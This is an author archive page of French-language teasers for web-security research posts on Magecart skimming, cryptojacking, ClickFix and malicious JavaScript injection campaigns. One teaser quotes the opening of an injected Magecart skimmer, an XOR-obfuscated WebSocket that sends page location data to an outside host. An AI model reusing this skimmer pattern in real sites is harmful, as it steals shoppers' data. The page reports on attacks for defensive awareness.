Articles by Himanshu Anand
Le CryptoJacking est mort : vive le CryptoJacking
Le cryptojacking moderne a évolué vers des attaques silencieuses et multi-étapes.
Himanshu AnandMagecart cible des sites e-commerce d'Asie de l'Est sous OpenCart
Nous avons détecté une attaque de type Magecart ciblant la plateforme CMS OpenCart
Himanshu AnandComment le détournement de trafic et la fraude aux affiliés peuvent nuire aux sites web et aux utilisateurs
Le détournement de trafic consiste à modifier secrètement la destination des liens d'un site web, afin de rediriger les visiteurs vers d'autres sites.
Himanshu AnandSe fier aux indicateurs de compromission est-il suffisant ?
La plupart des programmes de sécurité s'appuient encore largement sur les indicateurs de compromission (IOC). Cette approche échoue à détecter les menaces qui évoluent lentement, réutilisent des infrastructures ou opèrent dans des contextes ciblés à haute valeur, comme le skimming côté client.
Himanshu AnandAttaque côté client sur CoinMarketCap : une analyse complète
Le 20 juin 2025, CoinMarketCap (CMC) — pilier de l'écosystème des cryptomonnaies, utilisé par des millions de personnes pour accéder aux données crypto en temps réel — a subi un incident de sécurité majeur.
Himanshu AnandUn Google OAuth weaponisé déclenche un WebSocket malveillant
Un attaquant utilise 'Google.com' pour livrer et exécuter son propre code dans une attaque Google OAuth weaponisée.
Himanshu AnandAttaques impitoyables côté client ciblant plusieurs plates-formes avec ClickFix
Dans cet article, nous décomposons une variante récente de ClickFix qui cible désormais macOS, Android et iOS, en utilisant des redirections basées sur le navigateur, de fausses invites d'interface utilisateur et même des techniques de téléchargement en voiture.
Himanshu AnandUne arnaque chinoise pour adultes cible les utilisateurs mobiles via une PWA
Nous avons identifié une nouvelle campagne d'injection abusant de JavaScript tiers pour rediriger les utilisateurs.
Himanshu AnandPlus de 150 000 sites web touchés par un détournement de page entière redirigeant vers des sites de jeux d'argent chinois
Nous estimons qu'environ 150 000 sites web ont été touchés par cette campagne. Le script définit un tableau de mots-clés liés aux paris, aux jeux d'argent et aux marques de casinos, en anglais comme en chinois.
Himanshu AnandDes milliers de sites web touchés par quatre portes dérobées dans une attaque JavaScript tierce
En analysant les menaces ciblant les frameworks WordPress, nous avons découvert une attaque où un seul fichier JavaScript tiers a été utilisé pour injecter quatre portes dérobées distinctes dans 1 000 sites web compromis via cdn.csyndication[.]com/.
Himanshu AnandPlus de 35 000 sites web ciblés par un détournement de page entière redirigeant vers une arnaque de jeu en ligne en langue chinoise
Une nouvelle campagne de malware a compromis plus de 35 000 sites web en y injectant un script malveillant depuis les domaines listés ci-dessous. Une fois le script chargé, il détourne intégralement la fenêtre du navigateur de l'utilisateur, le redirigeant souvent vers des pages faisant la promotion d'une plateforme de jeux d'argent (ou de casino) en langue chinoise.
Himanshu AnandPlus de 10 000 sites WordPress identifiés comme vecteurs de malwares macOS et Windows
Nous avons identifié plus de 10 000 sites WordPress affichant une fausse page de mise à jour du navigateur Google menant au téléchargement de malwares.
Himanshu AnandSites web gouvernementaux et universitaires ciblés dans une attaque côté client ScriptAPI[.]dev
Hier, nous avons découvert une autre attaque JavaScript côté client ciblant plus de 500 sites web, dont des gouvernements et des universités. Les scripts injectés créent des liens cachés dans le Document Object Model (DOM), pointant vers des sites web externes, une interface de programmation pour les documents web.
Himanshu AnandLe coût des faux positifs - comment nous sommes devenus une cible
Cette semaine, nous avons identifié un cas d'usage intrigant impliquant l'attaque WP3[.]XYZ (lien vers notre article de blog). Cela a suscité l'intérêt de la communauté et a conduit à de meilleurs taux de détection sur des plateformes comme VirusTotal (lien VirusTotal). Bien que la plupart aient apprécié nos efforts, d'autres nous ont critiqués pour ne pas avoir identifié la cause profonde ou recommandé des services pour nettoyer les sites web piratés. Malgré cela, nous visons à sensibiliser la communauté aux attaques potentielles et promettons de faire encore mieux à l'avenir. Lorsque les faux
Himanshu AnandPlus de 5 000 sites WordPress pris dans l'attaque malveillante WP3[.]XYZ
Nous avons découvert une campagne de malware généralisée ciblant les sites WordPress, affectant plus de 5 000 sites dans le monde. Le domaine malveillant : \"https://wp3.xyz/plugin[.]php\".
Himanshu AnandNouvelle attaque par script JS tiers découverte : Artifyau[.]com et Quantifymy[.]com
Cette semaine, nous avons déployé un crawler spécialisé à des fins de recherche. En seulement 24 heures, il a réussi à identifier de nouveaux schémas d'attaque Magecart. Magecart est une menace sophistiquée à motivation financière qui injecte du JavaScript malveillant pour dérober des informations de paiement personnelles. Voici une liste des plus grandes attaques Magecart à ce jour. Détection initiale : JavaScript obfusqué sur Artifyau[.]com URL détectée : https://artifyau[.]com/T1M0dVluVnBiR1J6YVhSbGNISnZMbU52YlE9PQ/jqwery.js. L'URL imite un
Himanshu AnandNouveau code d'attaque Magecart révélé
Le 14 octobre, nous avons publié un article sur une nouvelle attaque Magecart ciblant Magento. À l'époque, nous n'avions identifié qu'un seul script comme responsable. Aujourd'hui, nous avons pu retrouver et analyser l'attaque plus en détail. L'attaque décodée Voici le code injecté : <script> const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23]; const zep = 42; window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.h
Himanshu AnandUn site e-commerce koweïtien est utilisé pour faciliter des attaques de skimming côté client
Un site e-commerce populaire au Koweït, fonctionnant avec une version obsolète de Magento (2.4), a été compromis par une injection JavaScript malveillante,
Himanshu AnandAttaque JavaScript Magecart côté client chez Cisco
Un jour de plus, une nouvelle attaque JavaScript côté client très médiatisée. Ce matin, nous avons appris que Cisco est la prochaine victime d'un code malveillant chargé
Himanshu AnandAttaque de la chaîne d'approvisionnement web via jQuery trojanisé sur npm, GitHub et les CDN
Des attaques ont été découvertes dans jQuery trojanisé sur GitHub, npm et jsDelivr dans le cadre d'une nouvelle attaque de la chaîne d'approvisionnement web. Chaque package contenait une copie de jQuery
Himanshu Anand